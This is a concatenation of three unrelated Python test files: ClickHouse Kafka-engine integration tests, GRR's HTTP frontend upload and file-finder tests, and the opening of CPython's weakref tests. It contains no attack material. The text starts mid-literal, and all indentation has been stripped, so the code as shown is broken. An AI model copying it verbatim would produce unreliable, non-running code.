x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
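# For each format: produce its sample messages (including the intentionally broken one)
# to a dedicated topic, create a Kafka table with kafka_handle_error_mode = 'stream', and
# attach two materialized views: one keeping rows with an empty _error column and one
# capturing _raw_message/_error for rows that failed to parse.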
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Set up {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if not format_opts.get('printable', False):
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Checking {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = ast.literal_eval(instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name)))
errors_expected = ast.literal_eval(format_opts['expected'])
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result['raw_message'] == errors_expected['raw_message'], 'Proper raw_message for format: {}'.format(format_name)
# Errors text can change, just checking prefixes
assert errors_expected['error'] in errors_result['error'], 'Proper error for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
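# Polls `SELECT count()` on the given table until the row count exceeds prev_count,
# sleeping 0.5s between attempts and raising after max_retries polls.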
def wait_for_new_data(table_name, prev_count = 0, max_retries = 120):
retries = 0
while True:
new_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
print(new_count)
if new_count > prev_count:
return new_count
else:
retries += 1
time.sleep(0.5)
if retries > max_retries:
raise Exception("No new data :(")
def test_kafka_consumer_failover(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = "kafka_consumer_failover"
kafka_create_topic(admin_client, topic_name, num_partitions=2)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.kafka3 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_consumer_failover',
kafka_group_name = 'kafka_consumer_failover_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1,
kafka_poll_timeout_ms = 200;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.kafka_mv TO test.destination AS
SELECT key, value, 'kafka' as _consumed_by
FROM test.kafka;
CREATE MATERIALIZED VIEW test.kafka2_mv TO test.destination AS
SELECT key, value, 'kafka2' as _consumed_by
FROM test.kafka2;
CREATE MATERIALIZED VIEW test.kafka3_mv TO test.destination AS
SELECT key, value, 'kafka3' as _consumed_by
FROM test.kafka3;
''')
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
## all 3 attached, 2 working
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':1,'value': 1}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination')
## 2 attached, 2 working
instance.query('DETACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':2,'value': 2}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':3,'value': 3}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':4,'value': 4}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 1 attached, 1 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':5,'value': 5}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, 2 working
instance.query('ATTACH TABLE test.kafka2')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':6,'value': 6}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 3 attached, 2 working
instance.query('ATTACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':7,'value': 7}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
## 2 attached, same 2 working
instance.query('DETACH TABLE test.kafka3')
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=0)
producer.send(topic='kafka_consumer_failover', value=json.dumps({'key':8,'value': 8}), partition=1)
producer.flush()
prev_count = wait_for_new_data('test.destination', prev_count)
kafka_delete_topic(admin_client, topic_name)
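# The Kafka table below takes its connection settings from the predefined configuration
# 'kafka1' in the server config; only kafka_format is passed inline.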
def test_kafka_predefined_configuration(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_name = 'conf'
kafka_create_topic(admin_client, topic_name)
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, topic_name, messages)
instance.query(f'''
CREATE TABLE test.kafka (key UInt64, value UInt64) ENGINE = Kafka(kafka1, kafka_format='CSV');
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
# https://github.com/ClickHouse/ClickHouse/issues/26643
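# Produces varint-length-delimited Protobuf messages (one fully populated, one with only
# tnow set), consumes them with kafka_format = 'Protobuf' and kafka_skip_broken_messages,
# and compares the rows that reach test.log against the expected output.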
def test_issue26643(kafka_cluster):
# for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port), value_serializer=producer_serializer)
topic_list = []
topic_list.append(NewTopic(name="test_issue26643", num_partitions=4, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
msg = message_with_repeated_pb2.Message(
tnow=1629000000,
server='server1',
clien='host1',
sPort=443,
cPort=50000,
r=[
message_with_repeated_pb2.dd(name='1', type=444, ttl=123123, data=b'adsfasd'),
message_with_repeated_pb2.dd(name='2')
],
method='GET'
)
data = b''
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
msg = message_with_repeated_pb2.Message(
tnow=1629000002
)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer.send(topic="test_issue26643", value=data)
data = _VarintBytes(len(serialized_msg)) + serialized_msg
producer.send(topic="test_issue26643", value=data)
producer.flush()
instance.query('''
CREATE TABLE IF NOT EXISTS test.test_queue
(
`tnow` UInt32,
`server` String,
`client` String,
`sPort` UInt16,
`cPort` UInt16,
`r.name` Array(String),
`r.class` Array(UInt16),
`r.type` Array(UInt16),
`r.ttl` Array(UInt32),
`r.data` Array(String),
`method` String
)
ENGINE = Kafka
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_issue26643',
kafka_group_name = 'test_issue26643_group',
kafka_format = 'Protobuf',
kafka_schema = 'message_with_repeated.proto:Message',
kafka_num_consumers = 4,
kafka_skip_broken_messages = 10000;
SET allow_suspicious_low_cardinality_types=1;
CREATE TABLE test.log
(
`tnow` DateTime CODEC(DoubleDelta, LZ4),
`server` LowCardinality(String),
`client` LowCardinality(String),
`sPort` LowCardinality(UInt16),
`cPort` UInt16 CODEC(T64, LZ4),
`r.name` Array(String),
`r.class` Array(LowCardinality(UInt16)),
`r.type` Array(LowCardinality(UInt16)),
`r.ttl` Array(LowCardinality(UInt32)),
`r.data` Array(String),
`method` LowCardinality(String)
)
ENGINE = MergeTree
PARTITION BY toYYYYMMDD(tnow)
ORDER BY (tnow, server)
TTL toDate(tnow) + toIntervalMonth(1000)
SETTINGS index_granularity = 16384, merge_with_ttl_timeout = 7200;
CREATE MATERIALIZED VIEW test.test_consumer TO test.log AS
SELECT
toDateTime(a.tnow) AS tnow,
a.server AS server,
a.client AS client,
a.sPort AS sPort,
a.cPort AS cPort,
a.`r.name` AS `r.name`,
a.`r.class` AS `r.class`,
a.`r.type` AS `r.type`,
a.`r.ttl` AS `r.ttl`,
a.`r.data` AS `r.data`,
a.method AS method
FROM test.test_queue AS a;
''')
instance.wait_for_log_line("Committed offset")
result = instance.query('SELECT * FROM test.log')
expected = '''\
2021-08-15 07:00:00 server1 443 50000 ['1','2'] [0,0] [444,0] [123123,0] ['adsfasd',''] GET
2021-08-15 07:00:02 0 0 [] [] [] [] []
2021-08-15 07:00:02 0 0 [] [] [] [] []
'''
assert TSV(result) == TSV(expected)
# kafka_cluster.open_bash_shell('instance')
if __name__ == '__main__':
cluster.start()
input("Cluster created, press any key to destroy...")
cluster.shutdown()
|
frontend_test.py
|
#!/usr/bin/env python
"""Unittest for grr http server."""
import hashlib
import os
import socket
import threading
import ipaddr
import portpicker
import requests
import logging
from grr.client import comms
from grr.client.client_actions import standard
from grr.lib import action_mocks
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import file_store
from grr.lib import flags
from grr.lib import flow
from grr.lib import front_end
from grr.lib import rdfvalue
from grr.lib import test_lib
from grr.lib import utils
from grr.lib import worker_mocks
from grr.lib.aff4_objects import filestore
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import file_finder as rdf_file_finder
from grr.lib.rdfvalues import paths as rdf_paths
from grr.tools import frontend
class GRRHTTPServerTest(test_lib.GRRBaseTest):
"""Test the http server."""
@classmethod
def setUpClass(cls):
super(GRRHTTPServerTest, cls).setUpClass()
# Frontend must be initialized to register all the stats counters.
front_end.FrontendInit().RunOnce()
# Bring up a local server for testing.
port = portpicker.PickUnusedPort()
ip = utils.ResolveHostnameToIP("localhost", port)
cls.httpd = frontend.GRRHTTPServer((ip, port),
frontend.GRRHTTPServerHandler)
if ipaddr.IPAddress(ip).version == 6:
cls.address_family = socket.AF_INET6
cls.base_url = "http://[%s]:%d/" % (ip, port)
else:
cls.address_family = socket.AF_INET
cls.base_url = "http://%s:%d/" % (ip, port)
cls.httpd_thread = threading.Thread(target=cls.httpd.serve_forever)
cls.httpd_thread.daemon = True
cls.httpd_thread.start()
@classmethod
def tearDownClass(cls):
cls.httpd.shutdown()
def setUp(self):
super(GRRHTTPServerTest, self).setUp()
self.client_id = self.SetupClients(1)[0]
def testServerPem(self):
req = requests.get(self.base_url + "server.pem")
self.assertEqual(req.status_code, 200)
self.assertTrue("BEGIN CERTIFICATE" in req.content)
def _UploadFile(self, args):
with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}):
client = comms.GRRHTTPClient(
ca_cert=config_lib.CONFIG["CA.certificate"],
private_key=config_lib.CONFIG.Get("Client.private_key", default=None))
client.server_certificate = config_lib.CONFIG["Frontend.certificate"]
def MockSendReply(_, reply):
self.reply = reply
@classmethod
def FromPrivateKey(*_):
"""Returns the correct client id.
The test framework does not generate valid client ids (which should be
related to the client's private key). We therefore need to mock it and
override.
Returns:
Correct client_id
"""
return self.client_id
with utils.MultiStubber((standard.UploadFile, "SendReply", MockSendReply),
(rdf_client.ClientURN, "FromPrivateKey",
FromPrivateKey)):
action = standard.UploadFile(client.client_worker)
action.Run(args)
return self.reply
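# Exercises upload-token validation end to end: a missing HMAC, a missing policy, a wrong
# HMAC, and an expired policy must all be rejected (and logged server-side) before a
# correctly signed, unexpired policy finally lets the upload through.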
def testUpload(self):
magic_string = "Hello world"
test_file = os.path.join(self.temp_dir, "sample.txt")
with open(test_file, "wb") as fd:
fd.write(magic_string)
args = rdf_client.UploadFileRequest()
args.pathspec.path = test_file
args.pathspec.pathtype = "OS"
# Errors are logged on the server but not always provided to the client. We
# check the server logs for the errors we inject.
with test_lib.Instrument(logging, "error") as logger:
# First do not provide a hmac at all.
with self.assertRaises(IOError):
self._UploadFile(args)
self.assertRegexpMatches("HMAC not provided", str(logger.args))
logger.args[:] = []
# Now pass a rubbish HMAC but forget to give a policy.
hmac = args.upload_token.GetHMAC()
args.upload_token.hmac = hmac.HMAC("This is the wrong filename")
with self.assertRaises(IOError):
self._UploadFile(args)
self.assertRegexpMatches("Policy not provided", str(logger.args))
logger.args[:] = []
# Ok - lets make an expired policy, Still wrong HMAC.
policy = rdf_client.UploadPolicy(client_id=self.client_id, expires=1000)
args.upload_token.SetPolicy(policy)
with self.assertRaises(IOError):
self._UploadFile(args)
self.assertRegexpMatches("Signature did not match digest",
str(logger.args))
logger.args[:] = []
# Ok lets hmac the policy now, but its still too old.
args.upload_token.SetPolicy(policy)
with self.assertRaises(IOError):
self._UploadFile(args)
# Make sure the file is not written yet.
rootdir = config_lib.CONFIG["FileUploadFileStore.root_dir"]
target_filename = os.path.join(
rootdir, self.client_id.Add(test_file).Path().lstrip(os.path.sep))
self.assertNotEqual(target_filename, test_file)
with self.assertRaises(IOError):
open(target_filename)
self.assertRegexpMatches("Client upload policy is too old",
str(logger.args))
logger.args[:] = []
# Lets expire the policy in the future.
policy.expires = rdfvalue.RDFDatetime.Now() + 1000
args.upload_token.SetPolicy(policy)
args.upload_token.GenerateHMAC()
r = self._UploadFile(args)
fs = file_store.FileUploadFileStore()
# Make sure the file was uploaded correctly.
fd = fs.OpenForReading(r.file_id)
data = fd.read()
self.assertEqual(data, magic_string)
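# Runs the ClientFileFinder flow against the live HTTP frontend using a real GRRHTTPClient
# with a fake threaded worker, and returns the flow's session id.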
def _RunClientFileFinder(self,
paths,
action,
network_bytes_limit=None,
client_id=None):
client_id = client_id or self.SetupClients(1)[0]
with test_lib.ConfigOverrider({"Client.server_urls": [self.base_url]}):
client = comms.GRRHTTPClient(
ca_cert=config_lib.CONFIG["CA.certificate"],
private_key=config_lib.CONFIG.Get("Client.private_key", default=None))
client.client_worker = worker_mocks.FakeThreadedWorker(client=client)
client.server_certificate = config_lib.CONFIG["Frontend.certificate"]
for s in test_lib.TestFlowHelper(
"ClientFileFinder",
action_mocks.ClientFileFinderClientMock(
client_worker=client.client_worker),
client_id=client_id,
paths=paths,
pathtype=rdf_paths.PathSpec.PathType.OS,
action=action,
process_non_regular_files=True,
network_bytes_limit=network_bytes_limit,
token=self.token):
session_id = s
return session_id
def testClientFileFinderUpload(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
action = rdf_file_finder.FileFinderAction(action_type=action_type)
session_id = self._RunClientFileFinder(paths, action)
collection = flow.GRRFlow.ResultCollectionForFID(
session_id, token=self.token)
results = list(collection)
self.assertEqual(len(results), 4)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = open(r.stat_entry.pathspec.path, "rb").read()
self.assertEqual(aff4_obj.Read(100), data[:100])
for hash_obj in [
r.uploaded_file.hash,
aff4_obj.Get(aff4_obj.Schema.HASH)
]:
self.assertEqual(hash_obj.md5, hashlib.md5(data).hexdigest())
self.assertEqual(hash_obj.sha1, hashlib.sha1(data).hexdigest())
self.assertEqual(hash_obj.sha256, hashlib.sha256(data).hexdigest())
def testClientFileFinderUploadLimit(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
action = rdf_file_finder.FileFinderAction(action_type=action_type)
with self.assertRaises(RuntimeError) as e:
self._RunClientFileFinder(paths, action, network_bytes_limit=2000)
self.assertIn("Action exceeded network send limit.", e.exception.message)
def testClientFileFinderUploadBound(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
download_action = rdf_file_finder.FileFinderDownloadActionOptions(
oversized_file_policy="DOWNLOAD_TRUNCATED", max_size=300)
action = rdf_file_finder.FileFinderAction(
action_type=action_type, download=download_action)
session_id = self._RunClientFileFinder(paths, action)
collection = flow.GRRFlow.ResultCollectionForFID(
session_id, token=self.token)
results = list(collection)
self.assertEqual(len(results), 4)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
data = aff4_obj.Read(1000000)
self.assertLessEqual(len(data), 300)
self.assertEqual(data,
open(r.stat_entry.pathspec.path, "rb").read(len(data)))
def testClientFileFinderUploadSkip(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
download_action = rdf_file_finder.FileFinderDownloadActionOptions(
oversized_file_policy="SKIP", max_size=300)
action = rdf_file_finder.FileFinderAction(
action_type=action_type, download=download_action)
session_id = self._RunClientFileFinder(paths, action)
collection = flow.GRRFlow.ResultCollectionForFID(
session_id, token=self.token)
results = list(collection)
# Only two instead of the usual four results.
self.assertEqual(len(results), 2)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, ["History.plist", "test.plist"])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(self.client_id), token=self.token)
self.assertEqual(
aff4_obj.Read(100), open(r.stat_entry.pathspec.path, "rb").read(100))
def testClientFileFinderFilestoreIntegration(self):
paths = [os.path.join(self.base_path, "**/*.plist")]
action_type = rdf_file_finder.FileFinderAction.Action.DOWNLOAD
action = rdf_file_finder.FileFinderAction(action_type=action_type)
client_ids = self.SetupClients(2)
session_ids = {
c: self._RunClientFileFinder(paths, action, client_id=c)
for c in client_ids
}
collections = {
c: flow.GRRFlow.ResultCollectionForFID(session_id, token=self.token)
for c, session_id in session_ids.iteritems()
}
for client_id, collection in collections.iteritems():
results = list(collection)
self.assertEqual(len(results), 4)
relpaths = [
os.path.relpath(p.stat_entry.pathspec.path, self.base_path)
for p in results
]
self.assertItemsEqual(relpaths, [
"History.plist", "History.xml.plist", "test.plist",
"parser_test/com.google.code.grr.plist"
])
for r in results:
aff4_obj = aff4.FACTORY.Open(
r.stat_entry.pathspec.AFF4Path(client_id), token=self.token)
# When files are uploaded to the server directly, we should get a
# FileStoreAFF4Object.
self.assertIsInstance(aff4_obj, file_store.FileStoreAFF4Object)
# There is a STAT entry.
self.assertTrue(aff4_obj.Get(aff4_obj.Schema.STAT))
# Make sure the HashFileStore has references to this file for
# all hashes.
hashes = aff4_obj.Get(aff4_obj.Schema.HASH)
fs = filestore.HashFileStore
md5_refs = list(fs.GetReferencesMD5(hashes.md5, token=self.token))
self.assertIn(aff4_obj.urn, md5_refs)
sha1_refs = list(fs.GetReferencesSHA1(hashes.sha1, token=self.token))
self.assertIn(aff4_obj.urn, sha1_refs)
sha256_refs = list(
fs.GetReferencesSHA256(hashes.sha256, token=self.token))
self.assertIn(aff4_obj.urn, sha256_refs)
# Open the file inside the file store.
urn, _ = fs(None, token=self.token).CheckHashes(hashes).next()
filestore_fd = aff4.FACTORY.Open(urn, token=self.token)
# This is a FileStoreAFF4Object too.
self.assertIsInstance(filestore_fd, file_store.FileStoreAFF4Object)
# No STAT object attached.
self.assertFalse(filestore_fd.Get(filestore_fd.Schema.STAT))
def main(args):
test_lib.main(args)
if __name__ == "__main__":
flags.StartMain(main)
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper
# Used in ReferencesTestCase.test_ref_created_during_del().
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
